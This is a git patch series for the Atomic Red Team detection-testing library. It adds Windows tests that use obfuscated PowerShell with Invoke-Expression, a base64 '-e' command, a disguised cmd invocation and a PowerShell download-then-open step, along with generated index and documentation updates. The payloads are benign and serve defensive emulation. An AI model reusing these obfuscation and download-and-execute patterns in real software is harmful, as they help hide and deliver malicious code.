From 189ae94750db61ac22eb759d3ecf4bb1b619f56a Mon Sep 17 00:00:00 2001 From: Adam Mashinchi <78813159+amashinchi-rc@users.noreply.github.com> Date: Mon, 26 Jul 2021 12:46:41 -0700 Subject: [PATCH 01/11] Update T1027.yaml Added additional obfuscated PowerShell example. --- atomics/T1027/T1027.yaml | 12 ++++++++++++ 1 file changed, 12 insertions(+) diff --git a/atomics/T1027/T1027.yaml b/atomics/T1027/T1027.yaml index 7210e5af..4d5a5c58 100644 --- a/atomics/T1027/T1027.yaml +++ b/atomics/T1027/T1027.yaml @@ -150,3 +150,15 @@ atomic_tests: command: | Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file} name: powershell + +- name: Obfuscated Command in PowerShell + auto_generated_guid: 8b3f4ed6-077b-4bdd-891c-2d237f19410f + description: | + This is an obfuscated PowerShell command which when executed prints "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary. + supported_platforms: + - windows + executor: + command: | + $cmDwhy =[TyPe]("{0}{1}" -f 'S','TrING') ; $pz2Sb0 =[TYpE]("{1}{0}{2}"-f'nv','cO','ert') ; &("{0}{2}{3}{1}{4}" -f'In','SiO','vOKe-EXp','ReS','n') ( (&("{1}{2}{0}"-f'blE','gET-','vaRIA') ('CMdw'+'h'+'y'))."v`ALUe"::("{1}{0}" -f'iN','jO').Invoke('',( (127, 162,151, 164,145 ,55 , 110 ,157 ,163 , 164 ,40,47, 110 , 145 ,154, 154 ,157 , 54 ,40, 146, 162 , 157,155 ,40, 120, 157 ,167,145 , 162 ,123,150 ,145 , 154 , 154 , 41,47)| .('%') { ( [CHAR] ( $Pz2sB0::"t`OinT`16"(( [sTring]${_}) ,8)))})) ) + name: powershell + From ba20bcd95a9ceb83b3d57511f791528542277326 Mon Sep 17 00:00:00 2001 From: Adam Mashinchi <78813159+amashinchi-rc@users.noreply.github.com> Date: Mon, 26 Jul 2021 12:52:18 -0700 Subject: [PATCH 02/11] Add obfuscated PowerShell to T1059.001 Additional obfuscated PowerShell example. --- atomics/T1059.001/T1059.001.yaml | 18 +++++++++++++++++- 1 file changed, 17 insertions(+), 1 deletion(-) diff --git a/atomics/T1059.001/T1059.001.yaml b/atomics/T1059.001/T1059.001.yaml index 23915cf6..096bfbf9 100644 --- a/atomics/T1059.001/T1059.001.yaml +++ b/atomics/T1059.001/T1059.001.yaml @@ -374,4 +374,20 @@ atomic_tests: Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force executor: command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop' - name: powershell \ No newline at end of file + name: powershell + + - name: PowerShell Command Execution + auto_generated_guid: a538de64-1c74-46ed-aa60-b995ed302598 + description: | + Use of obfuscated PowerShell to execute an arbitrary command; outputs "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary. + supported_platforms: + - windows + input_arguments: + obfuscated_code: + description: 'Defaults to: Invoke-Expression with a "Write-Host" line.' + type: string + default: JgAgACgAZwBjAG0AIAAoACcAaQBlAHsAMAB9ACcAIAAtAGYAIAAnAHgAJwApACkAIAAoACIAVwByACIAKwAiAGkAdAAiACsAIgBlAC0ASAAiACsAIgBvAHMAdAAgACcASAAiACsAIgBlAGwAIgArACIAbABvACwAIABmAHIAIgArACIAbwBtACAAUAAiACsAIgBvAHcAIgArACIAZQByAFMAIgArACIAaAAiACsAIgBlAGwAbAAhACcAIgApAA== + executor: + command: | + powershell.exe -e #{obfuscated_code} + name: command_prompt From 64966be2fd209074f79c720ea481834a432d9f88 Mon Sep 17 00:00:00 2001 From: Adam Mashinchi <78813159+amashinchi-rc@users.noreply.github.com> Date: Mon, 26 Jul 2021 12:57:10 -0700 Subject: [PATCH 03/11] Add Suspicious Execution to T1059.003 --- atomics/T1059.003/T1059.003.yaml | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) diff --git a/atomics/T1059.003/T1059.003.yaml b/atomics/T1059.003/T1059.003.yaml index cbe28a3f..3c1952e2 100644 --- a/atomics/T1059.003/T1059.003.yaml +++ b/atomics/T1059.003/T1059.003.yaml @@ -52,3 +52,23 @@ atomic_tests: cleanup_command: | del "#{file_contents_path}" name: command_prompt + +- name: Suspicious Execution via Windows Command Shell + auto_generated_guid: d0eb3597-a1b3-4d65-b33b-2cda8d397f20 + description: | + Command line executed via suspicious invocation. Example is from the 2021 Threat Detection Report by Red Canary. + supported_platforms: + - windows + input_arguments: + output_file: + description: File to output to + type: string + default: hello.txt + input_message: + description: Message to write to file + type: string + default: Hello, from CMD! + executor: + command: | + %LOCALAPPDATA:~-3,1%md /c echo #{input_message} > #{output_file} & type #{output_file} + name: command_prompt From e8899b4df6d24fb2f8fcc9a93e1e5fb3bdfd384c Mon Sep 17 00:00:00 2001 From: Adam Mashinchi <78813159+amashinchi-rc@users.noreply.github.com> Date: Mon, 26 Jul 2021 13:00:42 -0700 Subject: [PATCH 04/11] Additional PowerShell Download in T1105 --- atomics/T1105/T1105.yaml | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) diff --git a/atomics/T1105/T1105.yaml b/atomics/T1105/T1105.yaml index c90158a6..7838f6a5 100644 --- a/atomics/T1105/T1105.yaml +++ b/atomics/T1105/T1105.yaml @@ -381,3 +381,23 @@ atomic_tests: timeout --preserve-status #{timeout} whois -h #{remote_host} -p #{remote_port} "#{query}" > #{output_file} cleanup_command: | rm -f #{output_file} + +- name: File Download via PowerShell + auto_generated_guid: 54a4daf1-71df-4383-9ba7-f1a295d8b6d2 + description: | + Use PowerShell to download and write an arbitrary file from the internet. Example is from the 2021 Threat Detection Report by Red Canary. + supported_platforms: + - windows + input_arguments: + target_remote_file: + description: File to download + type: string + default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/4042cb3433bce024e304500dcfe3c5590571573a/LICENSE.txt + output_file: + description: File to write to + type: string + default: LICENSE.txt + executor: + command: | + (New-Object Net.WebClient).DownloadString('#{target_remote_file}') | Out-File #{output_file}; Invoke-Item #{output_file} + name: powershell From 0960fca14ee711f0f7e3369970643532afdf4ec5 Mon Sep 17 00:00:00 2001 From: Matt Graeber <60448025+mgraeber-rc@users.noreply.github.com> Date: Tue, 27 Jul 2021 09:47:29 -0400 Subject: [PATCH 05/11] Update T1059.001.yaml Removing extra space in line 379 --- atomics/T1059.001/T1059.001.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/atomics/T1059.001/T1059.001.yaml b/atomics/T1059.001/T1059.001.yaml index 096bfbf9..4ab3d989 100644 --- a/atomics/T1059.001/T1059.001.yaml +++ b/atomics/T1059.001/T1059.001.yaml @@ -376,7 +376,7 @@ atomic_tests: command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop' name: powershell - - name: PowerShell Command Execution +- name: PowerShell Command Execution auto_generated_guid: a538de64-1c74-46ed-aa60-b995ed302598 description: | Use of obfuscated PowerShell to execute an arbitrary command; outputs "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary. From d55b5813317428df989de068551269e445e4f175 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Tue, 27 Jul 2021 14:42:28 +0000 Subject: [PATCH 06/11] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/used_guids.txt | 1 + 1 file changed, 1 insertion(+) diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index bdecd84c..6b256736 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -732,3 +732,4 @@ c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08 b8e747c3-bdf7-4d71-bce2-f1df2a057406 a12b5531-acab-4618-a470-0dafb294a87a d400090a-d8ca-4be0-982e-c70598a23de9 +54a4daf1-71df-4383-9ba7-f1a295d8b6d2 From 5956ac532b512b860c7e2e3d719d81b80a87221e Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Tue, 27 Jul 2021 14:42:34 +0000 Subject: [PATCH 07/11] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + atomics/Indexes/index.yaml | 21 +++++++++++ atomics/T1105/T1105.md | 36 +++++++++++++++++++ 6 files changed, 61 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index f2257e0e..5705cb4a 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -860,6 +860,7 @@ command-and-control,T1105,Ingress Tool Transfer,11,OSTAP Worming Activity,2ca617 command-and-control,T1105,Ingress Tool Transfer,12,svchost writing a file to a UNC path,fa5a2759-41d7-4e13-a19c-e8f28a53566f,command_prompt command-and-control,T1105,Ingress Tool Transfer,13,Download a File with Windows Defender MpCmdRun.exe,815bef8b-bf91-4b67-be4c-abe4c2a94ccc,command_prompt command-and-control,T1105,Ingress Tool Transfer,14,whois file download,c99a829f-0bb8-4187-b2c6-d47d1df74cab,sh +command-and-control,T1105,Ingress Tool Transfer,15,File Download via PowerShell,54a4daf1-71df-4383-9ba7-f1a295d8b6d2,powershell command-and-control,T1090.001,Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh command-and-control,T1090.001,Internal Proxy,2,Connection Proxy for macOS UI,648d68c1-8bcd-4486-9abe-71c6655b6a2c,sh command-and-control,T1090.001,Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index b338da52..d4703978 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -528,6 +528,7 @@ command-and-control,T1105,Ingress Tool Transfer,10,Windows - PowerShell Download command-and-control,T1105,Ingress Tool Transfer,11,OSTAP Worming Activity,2ca61766-b456-4fcf-a35a-1233685e1cad,command_prompt command-and-control,T1105,Ingress Tool Transfer,12,svchost writing a file to a UNC path,fa5a2759-41d7-4e13-a19c-e8f28a53566f,command_prompt command-and-control,T1105,Ingress Tool Transfer,13,Download a File with Windows Defender MpCmdRun.exe,815bef8b-bf91-4b67-be4c-abe4c2a94ccc,command_prompt +command-and-control,T1105,Ingress Tool Transfer,15,File Download via PowerShell,54a4daf1-71df-4383-9ba7-f1a295d8b6d2,powershell command-and-control,T1090.001,Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell command-and-control,T1095,Non-Application Layer Protocol,1,ICMP C2,0268e63c-e244-42db-bef7-72a9e59fc1fc,powershell command-and-control,T1095,Non-Application Layer Protocol,2,Netcat C2,bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37,powershell diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 21b70104..f96bd50a 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -1559,6 +1559,7 @@ - Atomic Test #12: svchost writing a file to a UNC path [windows] - Atomic Test #13: Download a File with Windows Defender MpCmdRun.exe [windows] - Atomic Test #14: whois file download [linux, macos] + - Atomic Test #15: File Download via PowerShell [windows] - [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md) - Atomic Test #1: Connection Proxy [macos, linux] - Atomic Test #2: Connection Proxy for macOS UI [macos] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index d85cc21e..dd913c70 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -960,6 +960,7 @@ - Atomic Test #11: OSTAP Worming Activity [windows] - Atomic Test #12: svchost writing a file to a UNC path [windows] - Atomic Test #13: Download a File with Windows Defender MpCmdRun.exe [windows] + - Atomic Test #15: File Download via PowerShell [windows] - [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md) - Atomic Test #3: portproxy reg key [windows] - T1001.001 Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 4f451fdb..6e49e660 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -65221,6 +65221,27 @@ command-and-control: cleanup_command: 'rm -f #{output_file} ' + - name: File Download via PowerShell + auto_generated_guid: 54a4daf1-71df-4383-9ba7-f1a295d8b6d2 + description: 'Use PowerShell to download and write an arbitrary file from the + internet. Example is from the 2021 Threat Detection Report by Red Canary. + +' + supported_platforms: + - windows + input_arguments: + target_remote_file: + description: File to download + type: string + default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/4042cb3433bce024e304500dcfe3c5590571573a/LICENSE.txt + output_file: + description: File to write to + type: string + default: LICENSE.txt + executor: + command: "(New-Object Net.WebClient).DownloadString('#{target_remote_file}') + | Out-File #{output_file}; Invoke-Item #{output_file}\n" + name: powershell T1090.001: technique: external_references: diff --git a/atomics/T1105/T1105.md b/atomics/T1105/T1105.md index caef3d08..57e0c326 100644 --- a/atomics/T1105/T1105.md +++ b/atomics/T1105/T1105.md @@ -32,6 +32,8 @@ - [Atomic Test #14 - whois file download](#atomic-test-14---whois-file-download) +- [Atomic Test #15 - File Download via PowerShell](#atomic-test-15---file-download-via-powershell) +
@@ -589,4 +591,38 @@ echo "Please install timeout and the whois package" +
+
+ +## Atomic Test #15 - File Download via PowerShell +Use PowerShell to download and write an arbitrary file from the internet. Example is from the 2021 Threat Detection Report by Red Canary. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 54a4daf1-71df-4383-9ba7-f1a295d8b6d2 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| target_remote_file | File to download | string | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/4042cb3433bce024e304500dcfe3c5590571573a/LICENSE.txt| +| output_file | File to write to | string | LICENSE.txt| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +(New-Object Net.WebClient).DownloadString('#{target_remote_file}') | Out-File #{output_file}; Invoke-Item #{output_file} +``` + + + + + +
From 5e1b13f76fd309c4c24d5fa15e8739c2bc831beb Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Tue, 27 Jul 2021 14:44:49 +0000 Subject: [PATCH 08/11] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/used_guids.txt | 1 + 1 file changed, 1 insertion(+) diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 6b256736..c46cadb2 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -733,3 +733,4 @@ b8e747c3-bdf7-4d71-bce2-f1df2a057406 a12b5531-acab-4618-a470-0dafb294a87a d400090a-d8ca-4be0-982e-c70598a23de9 54a4daf1-71df-4383-9ba7-f1a295d8b6d2 +d0eb3597-a1b3-4d65-b33b-2cda8d397f20 From 1d8ca6c672ef46eb5df3c75adefb334e230637ea Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Tue, 27 Jul 2021 14:44:55 +0000 Subject: [PATCH 09/11] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + atomics/Indexes/index.yaml | 21 +++++++++++ atomics/T1059.003/T1059.003.md | 36 +++++++++++++++++++ 6 files changed, 61 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 5705cb4a..617fec9f 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -818,6 +818,7 @@ execution,T1059.005,Visual Basic,2,Encoded VBS code execution,e8209d5f-e42d-45e6 execution,T1059.005,Visual Basic,3,Extract Memory via VBA,8faff437-a114-4547-9a60-749652a03df6,powershell execution,T1059.003,Windows Command Shell,1,Create and Execute Batch Script,9e8894c0-50bd-4525-a96c-d4ac78ece388,powershell execution,T1059.003,Windows Command Shell,2,Writes text to a file and displays it.,127b4afe-2346-4192-815c-69042bec570e,command_prompt +execution,T1059.003,Windows Command Shell,3,Suspicious Execution via Windows Command Shell,d0eb3597-a1b3-4d65-b33b-2cda8d397f20,command_prompt execution,T1047,Windows Management Instrumentation,1,WMI Reconnaissance Users,c107778c-dcf5-47c5-af2e-1d058a3df3ea,command_prompt execution,T1047,Windows Management Instrumentation,2,WMI Reconnaissance Processes,5750aa16-0e59-4410-8b9a-8a47ca2788e2,command_prompt execution,T1047,Windows Management Instrumentation,3,WMI Reconnaissance Software,718aebaa-d0e0-471a-8241-c5afa69c7414,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index d4703978..87b366f5 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -585,6 +585,7 @@ execution,T1059.005,Visual Basic,2,Encoded VBS code execution,e8209d5f-e42d-45e6 execution,T1059.005,Visual Basic,3,Extract Memory via VBA,8faff437-a114-4547-9a60-749652a03df6,powershell execution,T1059.003,Windows Command Shell,1,Create and Execute Batch Script,9e8894c0-50bd-4525-a96c-d4ac78ece388,powershell execution,T1059.003,Windows Command Shell,2,Writes text to a file and displays it.,127b4afe-2346-4192-815c-69042bec570e,command_prompt +execution,T1059.003,Windows Command Shell,3,Suspicious Execution via Windows Command Shell,d0eb3597-a1b3-4d65-b33b-2cda8d397f20,command_prompt execution,T1047,Windows Management Instrumentation,1,WMI Reconnaissance Users,c107778c-dcf5-47c5-af2e-1d058a3df3ea,command_prompt execution,T1047,Windows Management Instrumentation,2,WMI Reconnaissance Processes,5750aa16-0e59-4410-8b9a-8a47ca2788e2,command_prompt execution,T1047,Windows Management Instrumentation,3,WMI Reconnaissance Software,718aebaa-d0e0-471a-8241-c5afa69c7414,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index f96bd50a..868bc4f7 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -1470,6 +1470,7 @@ - [T1059.003 Windows Command Shell](../../T1059.003/T1059.003.md) - Atomic Test #1: Create and Execute Batch Script [windows] - Atomic Test #2: Writes text to a file and displays it. [windows] + - Atomic Test #3: Suspicious Execution via Windows Command Shell [windows] - [T1047 Windows Management Instrumentation](../../T1047/T1047.md) - Atomic Test #1: WMI Reconnaissance Users [windows] - Atomic Test #2: WMI Reconnaissance Processes [windows] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index dd913c70..3fc9f744 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -1064,6 +1064,7 @@ - [T1059.003 Windows Command Shell](../../T1059.003/T1059.003.md) - Atomic Test #1: Create and Execute Batch Script [windows] - Atomic Test #2: Writes text to a file and displays it. [windows] + - Atomic Test #3: Suspicious Execution via Windows Command Shell [windows] - [T1047 Windows Management Instrumentation](../../T1047/T1047.md) - Atomic Test #1: WMI Reconnaissance Users [windows] - Atomic Test #2: WMI Reconnaissance Processes [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 6e49e660..9f6d2752 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -61581,6 +61581,27 @@ execution: ' name: command_prompt + - name: Suspicious Execution via Windows Command Shell + auto_generated_guid: d0eb3597-a1b3-4d65-b33b-2cda8d397f20 + description: 'Command line executed via suspicious invocation. Example is from + the 2021 Threat Detection Report by Red Canary. + +' + supported_platforms: + - windows + input_arguments: + output_file: + description: File to output to + type: string + default: hello.txt + input_message: + description: Message to write to file + type: string + default: Hello, from CMD! + executor: + command: "%LOCALAPPDATA:~-3,1%md /c echo #{input_message} > #{output_file} + & type #{output_file}\n" + name: command_prompt T1047: technique: id: attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055 diff --git a/atomics/T1059.003/T1059.003.md b/atomics/T1059.003/T1059.003.md index 4a96ddef..61786e57 100644 --- a/atomics/T1059.003/T1059.003.md +++ b/atomics/T1059.003/T1059.003.md @@ -12,6 +12,8 @@ Adversaries may leverage [cmd](https://attack.mitre.org/software/S0106) to execu - [Atomic Test #2 - Writes text to a file and displays it.](#atomic-test-2---writes-text-to-a-file-and-displays-it) +- [Atomic Test #3 - Suspicious Execution via Windows Command Shell](#atomic-test-3---suspicious-execution-via-windows-command-shell) +
@@ -101,4 +103,38 @@ del "#{file_contents_path}" +
+
+ +## Atomic Test #3 - Suspicious Execution via Windows Command Shell +Command line executed via suspicious invocation. Example is from the 2021 Threat Detection Report by Red Canary. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** d0eb3597-a1b3-4d65-b33b-2cda8d397f20 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| output_file | File to output to | string | hello.txt| +| input_message | Message to write to file | string | Hello, from CMD!| + + +#### Attack Commands: Run with `command_prompt`! + + +```cmd +%LOCALAPPDATA:~-3,1%md /c echo #{input_message} > #{output_file} & type #{output_file} +``` + + + + + +
From e2cbd6059651db7cc4d160338150f7345c400d40 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Tue, 27 Jul 2021 14:47:07 +0000 Subject: [PATCH 10/11] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/used_guids.txt | 1 + 1 file changed, 1 insertion(+) diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index c46cadb2..18f2acca 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -734,3 +734,4 @@ a12b5531-acab-4618-a470-0dafb294a87a d400090a-d8ca-4be0-982e-c70598a23de9 54a4daf1-71df-4383-9ba7-f1a295d8b6d2 d0eb3597-a1b3-4d65-b33b-2cda8d397f20 +a538de64-1c74-46ed-aa60-b995ed302598 From 29a063b40bc2e4b0dbca2965d49eb3cfd040ea90 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Tue, 27 Jul 2021 14:47:14 +0000 Subject: [PATCH 11/11] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + atomics/Indexes/index.yaml | 19 ++++++++++ atomics/T1059.001/T1059.001.md | 35 +++++++++++++++++++ 6 files changed, 58 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 617fec9f..0da994fb 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -798,6 +798,7 @@ execution,T1059.001,PowerShell,15,ATHPowerShellCommandLineParameter -Command par execution,T1059.001,PowerShell,16,ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments,1c0a870f-dc74-49cf-9afc-eccc45e58790,powershell execution,T1059.001,PowerShell,17,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations,86a43bad-12e3-4e85-b97c-4d5cf25b95c3,powershell execution,T1059.001,PowerShell,18,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments,0d181431-ddf3-4826-8055-2dbf63ae848b,powershell +execution,T1059.001,PowerShell,19,PowerShell Command Execution,a538de64-1c74-46ed-aa60-b995ed302598,command_prompt execution,T1059.006,Python,1,Execute shell script via python's command mode arguement,3a95cdb2-c6ea-4761-b24e-02b71889b8bb,sh execution,T1059.006,Python,2,Execute Python via scripts (Linux),6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8,sh execution,T1059.006,Python,3,Execute Python via Python executables (Linux),0b44d79b-570a-4b27-a31f-3bf2156e5eaa,sh diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 87b366f5..d65ae1a4 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -571,6 +571,7 @@ execution,T1059.001,PowerShell,15,ATHPowerShellCommandLineParameter -Command par execution,T1059.001,PowerShell,16,ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments,1c0a870f-dc74-49cf-9afc-eccc45e58790,powershell execution,T1059.001,PowerShell,17,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations,86a43bad-12e3-4e85-b97c-4d5cf25b95c3,powershell execution,T1059.001,PowerShell,18,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments,0d181431-ddf3-4826-8055-2dbf63ae848b,powershell +execution,T1059.001,PowerShell,19,PowerShell Command Execution,a538de64-1c74-46ed-aa60-b995ed302598,command_prompt execution,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt execution,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt execution,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 868bc4f7..d7882ffa 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -1436,6 +1436,7 @@ - Atomic Test #16: ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments [windows] - Atomic Test #17: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations [windows] - Atomic Test #18: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments [windows] + - Atomic Test #19: PowerShell Command Execution [windows] - [T1059.006 Python](../../T1059.006/T1059.006.md) - Atomic Test #1: Execute shell script via python's command mode arguement [linux] - Atomic Test #2: Execute Python via scripts (Linux) [linux] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 3fc9f744..96a6d79c 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -1039,6 +1039,7 @@ - Atomic Test #16: ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments [windows] - Atomic Test #17: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations [windows] - Atomic Test #18: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments [windows] + - Atomic Test #19: PowerShell Command Execution [windows] - T1059.006 Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1053.005 Scheduled Task](../../T1053.005/T1053.005.md) - Atomic Test #1: Scheduled Task Startup Script [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 9f6d2752..2d41ec4d 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -60105,6 +60105,25 @@ execution: -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop' name: powershell + - name: PowerShell Command Execution + auto_generated_guid: a538de64-1c74-46ed-aa60-b995ed302598 + description: 'Use of obfuscated PowerShell to execute an arbitrary command; + outputs "Hello, from PowerShell!". Example is from the 2021 Threat Detection + Report by Red Canary. + +' + supported_platforms: + - windows + input_arguments: + obfuscated_code: + description: 'Defaults to: Invoke-Expression with a "Write-Host" line.' + type: string + default: JgAgACgAZwBjAG0AIAAoACcAaQBlAHsAMAB9ACcAIAAtAGYAIAAnAHgAJwApACkAIAAoACIAVwByACIAKwAiAGkAdAAiACsAIgBlAC0ASAAiACsAIgBvAHMAdAAgACcASAAiACsAIgBlAGwAIgArACIAbABvACwAIABmAHIAIgArACIAbwBtACAAUAAiACsAIgBvAHcAIgArACIAZQByAFMAIgArACIAaAAiACsAIgBlAGwAbAAhACcAIgApAA== + executor: + command: 'powershell.exe -e #{obfuscated_code} + +' + name: command_prompt T1059.006: technique: external_references: diff --git a/atomics/T1059.001/T1059.001.md b/atomics/T1059.001/T1059.001.md index d86d109d..4f969e4f 100644 --- a/atomics/T1059.001/T1059.001.md +++ b/atomics/T1059.001/T1059.001.md @@ -46,6 +46,8 @@ PowerShell commands/scripts can also be executed without directly invoking the < - [Atomic Test #18 - ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments](#atomic-test-18---athpowershellcommandlineparameter--encodedcommand-parameter-variations-with-encoded-arguments) +- [Atomic Test #19 - PowerShell Command Execution](#atomic-test-19---powershell-command-execution) +
@@ -768,4 +770,37 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force +
+
